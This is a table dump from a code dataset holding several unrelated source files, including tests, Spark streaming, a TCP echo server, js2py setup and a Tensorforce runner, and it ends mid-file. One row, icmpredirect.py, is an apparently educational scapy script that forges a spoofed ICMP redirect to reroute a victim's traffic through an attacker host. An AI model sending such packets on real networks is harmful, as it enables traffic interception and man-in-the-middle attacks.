max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
altair_saver/savers/tests/test_html.py | RoyalTS/altair_saver | 0 | 12762151 | import io
import json
import os
from typing import Any, Dict, IO, Iterator, Optional, Tuple
from altair_data_server import Provider
from PIL import Image
import pytest
import selenium.webdriver
from selenium.webdriver.remote.webdriver import WebDriver
from altair_saver import HTMLSaver
from altair_saver._utils import internet_connected
CDN_URL = "https://cdn.jsdelivr.net"
@pytest.fixture(scope="module")
def internet_ok() -> bool:
    """Module-scoped fixture: True when an internet connection is available.

    Rendering tests use this to xfail gracefully when CDN resources
    cannot be fetched (see test_html_save_rendering).
    """
    return internet_connected()


@pytest.fixture(scope="module")
def provider() -> Iterator[Provider]:
    """Module-scoped altair_data_server Provider; stopped on teardown."""
    provider = Provider()
    yield provider
    provider.stop()


@pytest.fixture(scope="module")
def driver() -> Iterator[WebDriver]:
    """Module-scoped headless Chrome WebDriver; quit on teardown."""
    options = selenium.webdriver.chrome.options.Options()
    options.add_argument("--headless")
    # Chrome refuses to run sandboxed as root (e.g. inside CI containers).
    if hasattr(os, "geteuid") and (os.geteuid() == 0):
        options.add_argument("--no-sandbox")
    driver = selenium.webdriver.Chrome(options=options)
    yield driver
    driver.quit()
def get_testcases() -> Iterator[Tuple[str, Dict[str, Any]]]:
    """Yield (name, data) pairs for every testcase bundled next to this module.

    Each testcase is a pair of files in the ``testcases`` directory:
    ``<name>.vl.json`` (Vega-Lite spec) and ``<name>.png`` (expected render).
    """
    testcase_dir = os.path.join(os.path.dirname(__file__), "testcases")
    names = {entry.split(".")[0] for entry in os.listdir(testcase_dir)}
    for name in sorted(names):
        spec_path = os.path.join(testcase_dir, f"{name}.vl.json")
        png_path = os.path.join(testcase_dir, f"{name}.png")
        with open(spec_path) as handle:
            spec = json.load(handle)
        with open(png_path, "rb") as handle:
            expected_png = handle.read()
        yield name, {"vega-lite": spec, "png": expected_png}
@pytest.mark.parametrize("inline", [True, False])
@pytest.mark.parametrize("embed_options", [None, {"theme": "dark"}])
@pytest.mark.parametrize("case, data", get_testcases())
def test_html_save(
    case: str, data: Dict[str, Any], embed_options: Optional[dict], inline: bool
) -> None:
    """Saving as 'html' produces a full standalone document embedding the
    spec and embed options; inline=True must avoid all CDN references."""
    saver = HTMLSaver(data["vega-lite"], inline=inline, embed_options=embed_options)
    fp = io.StringIO()
    saver.save(fp, "html")
    html = fp.getvalue()
    assert isinstance(html, str)
    assert html.strip().startswith("<!DOCTYPE html>")
    # Spec and embed options are serialized verbatim into the document.
    assert json.dumps(data["vega-lite"]) in html
    assert f"const embedOpt = {json.dumps(embed_options or {})}" in html
    if inline:
        # Inline output must be self-contained (JS bundled, no CDN).
        assert CDN_URL not in html
    else:
        assert CDN_URL in html


@pytest.mark.parametrize("embed_options", [None, {"theme": "dark"}])
@pytest.mark.parametrize("case, data", get_testcases())
def test_html_mimebundle(
    case: str, data: Dict[str, Any], embed_options: Optional[dict],
) -> None:
    """The 'html' mimebundle is a CDN-backed <div> snippet, not a full page."""
    saver = HTMLSaver(data["vega-lite"], embed_options=embed_options)
    bundle = saver.mimebundle("html")
    assert bundle.keys() == {"text/html"}
    html = bundle["text/html"]
    assert isinstance(html, str)
    assert html.strip().startswith("<div")
    assert json.dumps(data["vega-lite"]) in html
    assert json.dumps(embed_options or {}) in html
    assert CDN_URL in html


def test_bad_format() -> None:
    """Requesting an unsupported format from HTMLSaver raises ValueError."""
    saver = HTMLSaver({})
    with pytest.raises(ValueError):
        saver.mimebundle("vega")
@pytest.mark.parametrize("case, data", get_testcases())
@pytest.mark.parametrize("inline", [True, False])
def test_html_save_rendering(
    provider: Provider,
    driver: WebDriver,
    case: str,
    data: Dict[str, Any],
    inline: bool,
    internet_ok: bool,
) -> None:
    """Render the saved HTML in headless Chrome and compare the chart's size
    against the reference PNG (40-pixel tolerance per dimension)."""
    # Non-inline output loads the Vega libraries from the CDN, so it needs
    # network access.
    if not (inline or internet_ok):
        pytest.xfail("Internet connection not available")
    saver = HTMLSaver(data["vega-lite"], inline=inline)
    fp = io.StringIO()
    saver.save(fp, "html")
    html = fp.getvalue()
    # Serve the document over HTTP so Chrome renders it like a real page.
    resource = provider.create(content=html, extension="html")
    driver.set_window_size(800, 600)
    driver.get(resource.url)
    # NOTE(review): find_element_by_class_name was removed in Selenium 4 —
    # confirm the pinned selenium version supports this legacy API.
    element = driver.find_element_by_class_name("vega-visualization")
    png = driver.get_screenshot_as_png()
    im = Image.open(io.BytesIO(png))
    # Crop the full-page screenshot down to the chart element's bounding box.
    left = element.location["x"]
    top = element.location["y"]
    right = element.location["x"] + element.size["width"]
    bottom = element.location["y"] + element.size["height"]
    im = im.crop((left, top, right, bottom))
    im_expected = Image.open(io.BytesIO(data["png"]))
    # Only the rendered size is compared, not pixel content.
    assert abs(im.size[0] - im_expected.size[0]) < 40
    assert abs(im.size[1] - im_expected.size[1]) < 40
@pytest.mark.parametrize("requirejs", [True, False])
@pytest.mark.parametrize("case, data", get_testcases())
def test_html_mimebundle_rendering(
    provider: Provider,
    driver: WebDriver,
    case: str,
    data: Dict[str, Any],
    requirejs: bool,
    internet_ok: bool,
) -> None:
    """Render the mimebundle snippet in headless Chrome — both inside a page
    that preloads RequireJS and inside a bare page — and compare the chart's
    size against the reference PNG (40-pixel tolerance per dimension)."""
    # The snippet always loads its dependencies from the CDN.
    if not internet_ok:
        pytest.xfail("Internet connection not available")
    saver = HTMLSaver(data["vega-lite"])
    bundle = saver.mimebundle("html")
    html = bundle["text/html"]
    assert isinstance(html, str)
    if requirejs:
        # Exercise the snippet under an AMD module loader (RequireJS).
        html = f"""<!DOCTYPE html>
<html>
<head><script src="{CDN_URL}/npm/requirejs@2.3.6"></script></head>
<body>{html}</body>
</html>
"""
    else:
        html = f"<html>{html}</html>"
    resource = provider.create(content=html, extension="html")
    driver.set_window_size(800, 600)
    driver.get(resource.url)
    # NOTE(review): find_element_by_class_name was removed in Selenium 4 —
    # confirm the pinned selenium version supports this legacy API.
    element = driver.find_element_by_class_name("vega-visualization")
    png = driver.get_screenshot_as_png()
    im = Image.open(io.BytesIO(png))
    # Crop the full-page screenshot down to the chart element's bounding box.
    left = element.location["x"]
    top = element.location["y"]
    right = element.location["x"] + element.size["width"]
    bottom = element.location["y"] + element.size["height"]
    im = im.crop((left, top, right, bottom))
    im_expected = Image.open(io.BytesIO(data["png"]))
    # Only the rendered size is compared, not pixel content.
    assert abs(im.size[0] - im_expected.size[0]) < 40
    assert abs(im.size[1] - im_expected.size[1]) < 40
| 2.203125 | 2 |
icmpredirect.py | haelee/allbypythonself | 3 | 12762152 | <reponame>haelee/allbypythonself<filename>icmpredirect.py
# All-by-Pythonself
# Snippet for ICMP redirect attacks
# by <NAME>
# at Cheongju University
from scapy . all import *
# Craft an ICMP "Redirect for Host" (type=5, code=1) telling 10.0.2.4 that
# traffic should go via gateway 10.0.2.15 (the attacker's address), with a
# spoofed copy of an "original" UDP datagram embedded, as redirects require.
p = IP (src = "10.0.2.1", dst = "10.0.2.4") / ICMP (type = 5, code = 1, gw = "10.0.2.15") / IP (src = "10.0.2.4", dst = "172.16.17.32") / UDP ()
# Inject the forged packet onto the wire.
send (p)
| 1.992188 | 2 |
mepo.d/command/config/config.py | GEOS-ESM/mepo | 0 | 12762153 | import subprocess as sp
from state.state import MepoState
from command.config.get import get
from command.config.set import set
from command.config.delete import delete
from command.config.print import print
def run(args):
    """Dispatch `mepo config <subcommand>` to its implementation module.

    NOTE: the helpers imported above (`set`, `print`) shadow Python builtins
    at module level; they are modules, each exposing a run(args) entry point.
    Raises KeyError if args.mepo_config_cmd is not one of the known commands.
    """
    # Map subcommand name -> handler module.
    d = {
        'get': get,
        'set': set,
        'delete': delete,
        'print': print
    }
    d[args.mepo_config_cmd].run(args)
| 1.984375 | 2 |
hexomap/npmath.py | GrayFrazierCMU/HEXOMAP | 11 | 12762154 | <filename>hexomap/npmath.py
#!/usr/bin/env python
# -*- coding: UTF-8 no BOM -*-
"""
Useful math functions for processing HEDM data implemented in numpy.
"""
import numpy as np
from numpy.linalg import norm
def normalize(vec, axis=None):
    """Return *vec* scaled to unit Euclidean norm.

    Parameters
    ----------
    vec : array_like
        Vector or matrix to normalize; converted to float64 internally.
    axis : int, optional
        None : normalize the entire vector/matrix by its global norm
        0    : normalize each column independently
        1    : normalize each row independently

    Returns
    -------
    np.ndarray
        Array of the same shape as *vec*.
    """
    vec = np.array(vec, dtype=np.float64)
    if axis is None:
        return vec/norm(vec)
    # keepdims=True keeps the reduced axis as size 1 so the division
    # broadcasts per-row/per-column, replacing the old tile/reshape
    # gymnastics with an equivalent (and clearer) expression.
    return vec/norm(vec, axis=axis, keepdims=True)
def random_three_vector():
    """Draw a random 3D unit vector uniformly distributed over the sphere.

    Sampling the azimuth uniformly in [0, 2*pi) and cos(polar) uniformly in
    [-1, 1] yields a uniform spherical distribution.  Algo from
    http://stackoverflow.com/questions/5408276/python-uniform-spherical-distribution
    """
    azimuth = np.random.uniform(0, np.pi*2)
    cos_polar = np.random.uniform(-1, 1)
    polar = np.arccos(cos_polar)
    sin_polar = np.sin(polar)
    return np.array([
        sin_polar * np.cos(azimuth),
        sin_polar * np.sin(azimuth),
        np.cos(polar),
    ])
def safe_dotprod(vec1, vec2):
    """Dot product of the normalized inputs, clamped into [-1.0, 1.0].

    Both vectors are normalized first; the clamp guards against
    floating-point round-off pushing the cosine slightly out of range.
    """
    raw = np.dot(normalize(vec1), normalize(vec2))
    return min(1.0, max(-1.0, raw))
def ang_between(vec1: np.ndarray, vec2: np.ndarray) -> float:
    """Return the angle (radians) between vec1 and vec2.

    Uses safe_dotprod so that floating-point round-off cannot push the
    cosine outside [-1, 1], which previously made np.arccos return NaN
    for (anti)parallel vectors.
    """
    return np.arccos(safe_dotprod(vec1, vec2))
if __name__ == "__main__":
pass | 3.09375 | 3 |
repo/script.module.liveresolver/lib/js2py/pyjs.py | Hades01/Addons | 3 | 12762155 | from base import *
from constructors.jsmath import Math
from constructors.jsdate import Date
from constructors.jsobject import Object
from constructors.jsfunction import Function
from constructors.jsstring import String
from constructors.jsnumber import Number
from constructors.jsboolean import Boolean
from constructors.jsregexp import RegExp
from constructors.jsarray import Array
from prototypes.jsjson import JSON
from host.console import console
from host.jseval import Eval
from host.jsfunctions import parseFloat, parseInt, isFinite, isNaN
# Now we have all the necessary items to create global environment for script
# NOTE(review): 'PyJsException', 'PyExceptionToJs' and 'JsToPyException' are
# each listed twice in __all__ — harmless but redundant.
__all__ = ['Js', 'PyJsComma', 'PyJsStrictEq', 'PyJsStrictNeq',
           'PyJsException', 'PyJsBshift', 'Scope', 'PyExceptionToJs',
           'JsToPyException', 'JS_BUILTINS', 'appengine', 'set_global_object',
           'JsRegExp', 'PyJsException', 'PyExceptionToJs', 'JsToPyException', 'PyJsSwitchException']
# these were defined in base.py
builtins = ('true','false','null','undefined','Infinity',
            'NaN', 'console', 'String', 'Number', 'Boolean', 'RegExp',
            'Math', 'Date', 'Object', 'Function', 'Array',
            'parseFloat', 'parseInt', 'isFinite', 'isNaN')
#Array, Function, JSON, Error is done later :)
# also some built in functions like eval...
def set_global_object(obj):
    """Install *obj* as the JS global object: bind 'this' to it and expose
    it through PyJs.GlobalObject."""
    obj.IS_CHILD_SCOPE = False
    this = This({})
    this.own = obj.own
    this.prototype = obj.prototype
    PyJs.GlobalObject = this
    # make this available
    obj.register('this')
    obj.put('this', this)
# Build the default scope mapping JS built-in names to their Python
# implementations.  NOTE: dict.iteritems() below means this module is
# Python 2 only.
scope = dict(zip(builtins, [globals()[e] for e in builtins]))
# Now add errors:
for name, error in ERRORS.iteritems():
    scope[name] = error
#add eval
scope['eval'] = Eval
scope['JSON'] = JSON
# Snapshot the scope into JS_BUILTINS (a plain shallow copy of 'scope').
JS_BUILTINS = {}
#k:v for k,v in scope.iteritems()
for k,v in scope.iteritems():
    JS_BUILTINS[k] = v
| 2.15625 | 2 |
test/PyPrometheus_test.py | RusDavies/PyPrometheus | 0 | 12762156 | import unittest
from PyPrometheus import Prometheus
from pathlib import Path
import urllib3
from datetime import datetime, timedelta
import json
urllib3.disable_warnings()
def delete_folder(pth: Path) -> None:
    """Recursively delete directory *pth* and everything inside it.

    Does nothing if *pth* does not exist.
    """
    if not pth.exists():
        return
    for child in pth.iterdir():
        if child.is_dir():
            delete_folder(child)
        else:
            child.unlink()
    pth.rmdir()
class TestPyPrometheus(unittest.TestCase):
    """Tests for the Prometheus client; most are @unittest.skip'd scaffolding."""
    @classmethod
    def setUpClass(cls):
        # Load the shared test configuration once for the whole class.
        with open('./test/config_test_TestPyPrometheus.json', 'r') as file:
            tmp = file.read()
        cls.test_config = json.loads(tmp)
        # Fixup file and path strings into Path objects
        for item in ['cache_path', 'metrics_config_file']:
            cls.test_config[item] = Path(cls.test_config[item])
        # Get our metrics configuration
        with open(cls.test_config['metrics_config_file'], 'r') as file:
            tmp = file.read()
        cls.metrics = json.loads(tmp)
        cls.api_url = cls.test_config['url']
        cls.ssl_verify = cls.test_config['ssl_verify']
        cls.configfile = cls.test_config['metrics_config_file']
        cls.filename = cls.test_config['test_data']
        cls.cache_path = cls.test_config['cache_path']
        return
    def setUp(self) -> None:
        # Start every test with an empty cache directory.
        delete_folder(self.cache_path)
        return super().setUp()
    def _instantiate_instance(self):
        # Helper: build the instance-under-test from the class-level config.
        iut = Prometheus(self.api_url, metrics_config_file=self.configfile, cache_path=self.cache_path, ssl_verify=self.ssl_verify)
        return iut
    @unittest.skip
    def test_constructor(self):
        iut = self._instantiate_instance()
        self.assertIsNotNone( iut )
        return
    @unittest.skip
    def test_load_metrics_config(self):
        iut = self._instantiate_instance()
        # The object should have a _load_metrics_config attribute
        self.assertTrue( hasattr(iut, '_load_metrics_config' ) )
        # Run the method, with a passed config file
        iut._load_metrics_config(self.configfile)
        self.assertTrue( hasattr(iut, '_metrics_config' ) )
        self.assertIsNotNone( iut._metrics_config )
        # Make sure we loaded what we expected
        self.assertIsNotNone( iut._metrics_config.get('node_disk_read_bytes_total', None))
        self.assertIsNotNone( iut._metrics_config.get('node_filesystem_avail_bytes', None) )
        self.assertIsNotNone( iut._metrics_config.get('node_load1', None) )
        return
    @unittest.skip
    def test_load_metrics_config_exception_no_metrics_file(self):
        # Calling _load_metrics_config with no file must raise the exact
        # ValueError message below.
        iut = self._instantiate_instance()
        expected_exception = False
        expected_exception_msg = 'No metrics config file set. Cannot continue.'
        try:
            iut._load_metrics_config()
        except ValueError as e:
            if(e.args[0] == expected_exception_msg):
                expected_exception =True
        except Exception as e:
            self.fail('Recevied an unexpected exception: {}'.format(e))
        self.assertTrue(expected_exception)
        return
    @unittest.skip
    def test_load_metrics_config_exception_metrics_file_does_not_exist(self):
        iut = self._instantiate_instance()
        path = Path('./does_not_exist.conf')
        if(path.exists()):
            raise ValueError("The file '{}' shouldn't exist fopr this test, yet it actually does. Weird!".format(path))
        expected_exception = False
        expected_exception_msg = "The configuration file '{}' does not exist".format(path)
        try:
            iut._load_metrics_config(path)
        except ValueError as e:
            if(e.args[0] == expected_exception_msg):
                expected_exception =True
        except Exception as e:
            self.fail('Recevied an unexpected exception: {}'.format(e))
        self.assertTrue(expected_exception)
        return
    @unittest.skip
    def test_get_metrics(self):
        # Placeholder: unconditionally fails if ever un-skipped.
        self.assertFalse( True )
        return
    # NOTE(review): '<EMAIL>' below is an anonymization artifact — most
    # likely a mangled decorator or tag; this line is not valid Python.
    # Confirm against the original source.
    <EMAIL>
    def test_get_metric(self):
        # Live query over the last hour for the first configured metric.
        iut = self._instantiate_instance()
        metric = list(iut._metrics_config.keys())[0]
        endtime = datetime.now()
        starttime = endtime - timedelta(hours=1)
        result = iut.get_metric(metric, starttime=starttime, endtime=endtime)
        self.assertIsNotNone( result )
        result_item = iut.prometheus_data.get(metric, None)
        self.assertIsNotNone( result_item )
        self.assertIsNotNone( result_item.get('data', None))
        self.assertIsNotNone( result_item.get('df', None))
        return
# Run the unittest discovery/runner when executed as a script.
if __name__ == '__main__':
    unittest.main()
| 2.234375 | 2 |
carling/io/__init__.py | mc-digital/carling | 6 | 12762157 | from .avro_schema import generate_avro_schema_from_template, load_avro_schema
# Public API of carling.io: only the two Avro-schema helpers are exported.
__all__ = (
    "generate_avro_schema_from_template",
    "load_avro_schema",
)
| 1.09375 | 1 |
phase2/main.py | rewrihitesh/wikipedia-search-engine | 0 | 12762158 | from timeit import default_timer
from parser import wikihandler
import xml.sax as sax
import utility
def main():
    """Parse each of the 35 pre-split wiki XML dumps and build the index.

    A fresh SAX parser/handler pair is created per file so parser state
    from one dump cannot leak into the next; per-file wall-clock time is
    printed after each parse.
    """
    # Configure output locations for the index and statistics files.
    utility.setIndexPath()
    utility.setStatPath()
    for file_no in range(35):
        start = default_timer()
        parser = sax.make_parser()
        handler = wikihandler()
        parser.setFeature(sax.handler.feature_namespaces, 0)
        parser.setContentHandler(handler)
        # Path to the split XML dumps on the data disk.
        parser.parse("/mnt/sdb1/phase2/data/" + str(file_no) + ".xml")
        stop = default_timer()
        print('\nTime elasped in sec: ', stop - start)
        print('file no.:: ', str(file_no))
if __name__ == "__main__":
    # Time the full indexing run end to end.
    start = default_timer()
    main()
    stop = default_timer()
    print ('\nTotal Time elasped in sec: ',stop - start)
| 2.59375 | 3 |
boto3_exceptions/elb.py | siteshen/boto3_exceptions | 2 | 12762159 | import boto3
# Flat re-exports of the botocore-generated exception classes for the
# classic Elastic Load Balancing (ELB) client, so callers can import them
# directly by name instead of going through client.exceptions.
# NOTE(review): boto3.client('elb') is created at import time, which needs a
# resolvable region/credentials configuration — confirm this is acceptable.
exceptions = boto3.client('elb').exceptions
AccessPointNotFoundException = exceptions.AccessPointNotFoundException
CertificateNotFoundException = exceptions.CertificateNotFoundException
DependencyThrottleException = exceptions.DependencyThrottleException
DuplicateAccessPointNameException = exceptions.DuplicateAccessPointNameException
DuplicateListenerException = exceptions.DuplicateListenerException
DuplicatePolicyNameException = exceptions.DuplicatePolicyNameException
DuplicateTagKeysException = exceptions.DuplicateTagKeysException
InvalidConfigurationRequestException = exceptions.InvalidConfigurationRequestException
InvalidEndPointException = exceptions.InvalidEndPointException
InvalidSchemeException = exceptions.InvalidSchemeException
InvalidSecurityGroupException = exceptions.InvalidSecurityGroupException
InvalidSubnetException = exceptions.InvalidSubnetException
ListenerNotFoundException = exceptions.ListenerNotFoundException
LoadBalancerAttributeNotFoundException = exceptions.LoadBalancerAttributeNotFoundException
OperationNotPermittedException = exceptions.OperationNotPermittedException
PolicyNotFoundException = exceptions.PolicyNotFoundException
PolicyTypeNotFoundException = exceptions.PolicyTypeNotFoundException
SubnetNotFoundException = exceptions.SubnetNotFoundException
TooManyAccessPointsException = exceptions.TooManyAccessPointsException
TooManyPoliciesException = exceptions.TooManyPoliciesException
TooManyTagsException = exceptions.TooManyTagsException
UnsupportedProtocolException = exceptions.UnsupportedProtocolException
| 1.625 | 2 |
adminmgr/media/code/A3/task3/BD_167_260_770_7882_A4COXPP.py | IamMayankThakur/test-bigdata | 9 | 12762160 | <filename>adminmgr/media/code/A3/task3/BD_167_260_770_7882_A4COXPP.py
#!/usr/bin/python3
import findspark
findspark.init()
from pyspark import SparkConf,SparkContext
from pyspark.streaming import StreamingContext
from pyspark.sql import Row,SQLContext
import sys
import requests
def process_rdd1(time, rdd):
    """Print the top five hashtags of *rdd* as one comma-separated line.

    *rdd* is expected to already be sorted by descending count; *time* is
    the batch timestamp supplied by foreachRDD and is unused here.
    """
    top_five = rdd.collect()[0:5]
    # join() fixes two output bugs in the manual-counter version: a trailing
    # comma and a missing newline whenever fewer than five hashtags exist.
    print(",".join(tag for tag, _count in top_five))
# --- Streaming job wiring -------------------------------------------------
conf = SparkConf()
conf.setAppName("BigData")
sc = SparkContext(conf=conf)
# Batch interval comes from argv[2]; window length from argv[1] (slide = 1s).
ssc = StreamingContext(sc, int(sys.argv[2]))
ssc.checkpoint("~/checkpoint_BIGDATA")
dataStream = ssc.socketTextStream("localhost", 9009)
dataStream = dataStream.window(int(sys.argv[1]), 1)
# Field 7 of each ';'-separated record holds the comma-separated hashtags.
hashtags = dataStream.map(lambda w: w.split(';')[7])
hashtags = hashtags.map(lambda x: (x, 1))
hashtags = hashtags.map(lambda x: x[0].split(','))
hashtags = hashtags.flatMap(lambda x: x)
hashtags = hashtags.map(lambda x: (x, 1))
# Bug fix: compare string contents with '!=' instead of identity ('is not'),
# which is unreliable for strings and a SyntaxWarning on Python 3.8+.
hashtags = hashtags.filter(lambda x: x[0] != '')
hashtag = hashtags.reduceByKey(lambda x, y: x + y)
# Sort by count descending, then hashtag ascending for deterministic ties.
hashtag = hashtag.transform(lambda x: x.sortBy(lambda y: (-y[1], y[0])))
hashtag.foreachRDD(process_rdd1)
ssc.start()
ssc.awaitTermination(25)
ssc.stop()
| 2.21875 | 2 |
sockets/MiServidorCreado.py | Invarato/Jarroba | 2 | 12762161 | <reponame>Invarato/Jarroba<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Nuestro Servidor Software sobre el Servidor Físico
import socketserver
# Dirección IP
HOST = "192.168.127.12"
# El puerto privado que queramos escuchar, uno de los comprendidos entre 49152 y 65535 1-65535
PORT = 50000
class MiControladorTCP(socketserver.BaseRequestHandler):
    """
    Request-handler class for our server.
    It is instantiated once per connection to the server, and must
    override the handle() method to implement communication to the
    client.
    """
    def handle(self):
        """
        Overridden method driving the conversation on our server: receive
        each client message and echo back a wrapped response, looping until
        the client closes its side of the socket.
        """
        print('[Servidor 3] Cliente conectado desde: {}'.format(self.client_address[0]))
        socket_abierto = True
        while socket_abierto:
            print('[Servidor 4] Esperando por petición del cliente...')
            # recv() returns b'' once the peer closes the connection.
            dato_recibido_en_bytes = self.request.recv(1024).strip()
            if dato_recibido_en_bytes:
                dato_recibido_en_str = dato_recibido_en_bytes.decode("utf-8")
                print('[Servidor 5] Recibido desde el cliente: {}'.format(dato_recibido_en_str))
                # Echo the message back, wrapped in a server marker.
                respuesta_en_str = "## RESPUESTA DEL SERVIDOR: {} ##".format(dato_recibido_en_str)
                self.request.sendall(bytes(respuesta_en_str, encoding='utf8'))
                print('[Servidor 6] Se ha respondido al cliente con el mensaje: {}'.format(respuesta_en_str))
            else:
                print('[Servidor 7] El cliente ha cerrado el Socket desde su lado, cerrando socket desde el Servidor...')
                socket_abierto = False
if __name__ == "__main__":
    tupla_para_el_enlace = (HOST, PORT)
    # Bug fix: pre-initialize so the finally block cannot raise NameError
    # when TCPServer() itself fails before 'servidor' is ever bound.
    servidor = None
    try:
        print('[Servidor 1] Enlazando Socket en: {}'.format(tupla_para_el_enlace))
        with socketserver.TCPServer(tupla_para_el_enlace, MiControladorTCP) as servidor:
            print('[Servidor 2] Iniciando bucle del servidor. Para interrumpir pulsar a la vez las teclas: [Ctrl]+[C]')
            servidor.serve_forever()
    except KeyboardInterrupt:
        print('[Servidor 8] Interrupción por teclado')
    finally:
        if servidor is not None:
            servidor.shutdown()
            print('[Servidor 9] Servidor Cerrado')
| 3.140625 | 3 |
run.py | Woellchen/tensorforce | 0 | 12762162 | <gh_stars>0
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import importlib
import json
import os
import matplotlib
import numpy as np
from tensorforce.agents import Agent
from tensorforce.core.utils.json_encoder import NumpyJSONEncoder
from tensorforce.environments import Environment
from tensorforce.execution import Runner
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def main():
    """Tensorforce CLI runner: parse arguments, build agent + environment,
    execute one or more Runner repetitions, and optionally log/plot results.
    """
    parser = argparse.ArgumentParser(description='Tensorforce runner')
    # Agent arguments
    parser.add_argument(
        '-a', '--agent', type=str, default=None,
        help='Agent (name, configuration JSON file, or library module)'
    )
    parser.add_argument(
        '-n', '--network', type=str, default=None,
        help='Network (name, configuration JSON file, or library module)'
    )
    # Environment arguments
    parser.add_argument(
        '-e', '--environment', type=str, default=None,
        help='Environment (name, configuration JSON file, or library module)'
    )
    parser.add_argument(
        '-l', '--level', type=str, default=None,
        help='Level or game id, like `CartPole-v1`, if supported'
    )
    parser.add_argument(
        '-m', '--max-episode-timesteps', type=int, default=None,
        help='Maximum number of timesteps per episode'
    )
    parser.add_argument(
        '--visualize', action='store_true',
        help='Visualize agent--environment interaction, if supported'
    )
    parser.add_argument(
        '--visualize-directory', type=str, default=None,
        help='Directory to store videos of agent--environment interaction, if supported'
    )
    parser.add_argument(
        '--import-modules', type=str, default=None,
        help='Import comma-separated modules required for environment'
    )
    # Parallel execution arguments
    parser.add_argument(
        '--num-parallel', type=int, default=None,
        help='Number of environment instances to execute in parallel'
    )
    parser.add_argument(
        '--batch-agent-calls', action='store_true',
        help='Batch agent calls for parallel environment execution'
    )
    parser.add_argument(
        '--sync-timesteps', action='store_true',
        help='Synchronize parallel environment execution on timestep-level'
    )
    parser.add_argument(
        '--sync-episodes', action='store_true',
        help='Synchronize parallel environment execution on episode-level'
    )
    # NOTE(review): the implicit string concatenation in the next two help
    # texts is missing a separating space ("parallelized" + "environment").
    parser.add_argument(
        '--remote', type=str, choices=('multiprocessing', 'socket-client', 'socket-server'),
        default=None, help='Communication mode for remote environment execution of parallelized'
                           'environment execution'
    )
    parser.add_argument(
        '--blocking', action='store_true', help='Remote environments should be blocking'
    )
    parser.add_argument(
        '--host', type=str, default=None,
        help='Socket server hostname(s) or IP address(es), single value or comma-separated list'
    )
    parser.add_argument(
        '--port', type=str, default=None,
        help='Socket server port(s), single value or comma-separated list, increasing sequence if'
             'single host and port given'
    )
    # Runner arguments
    parser.add_argument(
        '-v', '--evaluation', action='store_true',
        help='Run environment (last if multiple) in evaluation mode'
    )
    parser.add_argument('-p', '--episodes', type=int, default=None, help='Number of episodes')
    parser.add_argument('-t', '--timesteps', type=int, default=None, help='Number of timesteps')
    parser.add_argument('-u', '--updates', type=int, default=None, help='Number of agent updates')
    parser.add_argument(
        '--mean-horizon', type=int, default=1,
        help='Number of episodes progress bar values and evaluation score are averaged over'
    )
    parser.add_argument(
        '--save-best-agent', type=str, default=None,
        help='Directory to save the best version of the agent according to the evaluation score'
    )
    # Logging arguments
    parser.add_argument('-r', '--repeat', type=int, default=1, help='Number of repetitions')
    parser.add_argument(
        '--path', type=str, default=None,
        help='Logging path, directory plus filename without extension'
    )
    parser.add_argument('--seaborn', action='store_true', help='Use seaborn')
    args = parser.parse_args()
    # Import any extra modules the environment needs (e.g. gym plugins).
    if args.import_modules is not None:
        for module in args.import_modules.split(','):
            importlib.import_module(name=module)
    # With --path set, record per-episode stats through a Runner callback.
    if args.path is None:
        callback = None
    else:
        assert os.path.splitext(args.path)[1] == ''
        # NOTE(review): args.visualize is a store_true flag and thus never
        # None — the second half of this assert is vacuous; possibly
        # args.visualize_directory was intended.
        assert args.episodes is not None and args.visualize is not None
        rewards = [list() for _ in range(args.episodes)]
        timesteps = [list() for _ in range(args.episodes)]
        seconds = [list() for _ in range(args.episodes)]
        agent_seconds = [list() for _ in range(args.episodes)]
        def callback(r):
            # One entry per repetition, indexed by episode number.
            rewards[r.episodes - 1].append(r.episode_rewards[-1])
            timesteps[r.episodes - 1].append(r.episode_timesteps[-1])
            seconds[r.episodes - 1].append(r.episode_seconds[-1])
            agent_seconds[r.episodes - 1].append(r.episode_agent_seconds[-1])
            return True
    # Assemble the environment specification dict from CLI flags.
    if args.environment is None:
        environment = None
    else:
        environment = dict(environment=args.environment)
        if args.level is not None:
            environment['level'] = args.level
        if args.visualize:
            environment['visualize'] = True
        if args.visualize_directory is not None:
            environment['visualize_directory'] = args.visualize_directory
    # Comma-separated host/port values become lists for parallel sockets.
    if args.host is not None and ',' in args.host:
        args.host = args.host.split(',')
    if args.port is not None and ',' in args.port:
        args.port = [int(x) for x in args.port.split(',')]
    elif args.port is not None:
        args.port = int(args.port)
    # socket-server mode only hosts the environment; no local runner.
    if args.remote == 'socket-server':
        Environment.create(
            environment=environment, max_episode_timesteps=args.max_episode_timesteps,
            remote=args.remote, port=args.port
        )
        return
    # Assemble the agent specification dict.
    if args.agent is None:
        agent = None
    else:
        agent = dict(agent=args.agent)
        if args.network is not None:
            agent['network'] = args.network
    # Execute the experiment --repeat times with fresh runners.
    for _ in range(args.repeat):
        runner = Runner(
            agent=agent, environment=environment, max_episode_timesteps=args.max_episode_timesteps,
            evaluation=args.evaluation, num_parallel=args.num_parallel, remote=args.remote,
            blocking=args.blocking, host=args.host, port=args.port
        )
        runner.run(
            num_episodes=args.episodes, num_timesteps=args.timesteps, num_updates=args.updates,
            batch_agent_calls=args.batch_agent_calls, sync_timesteps=args.sync_timesteps,
            sync_episodes=args.sync_episodes, callback=callback, mean_horizon=args.mean_horizon,
            save_best_agent=args.save_best_agent
        )
        runner.close()
    # Persist collected stats as JSON and plot the reward envelope as PNG.
    if args.path is not None:
        directory = os.path.split(args.path)[0]
        if directory != '' and not os.path.isdir(directory):
            os.makedirs(directory, exist_ok=True)
        with open(args.path + '.json', 'w') as filehandle:
            filehandle.write(
                json.dumps(dict(
                    rewards=rewards, timesteps=timesteps, seconds=seconds,
                    agent_seconds=agent_seconds
                ), cls=NumpyJSONEncoder)
            )
        if args.seaborn:
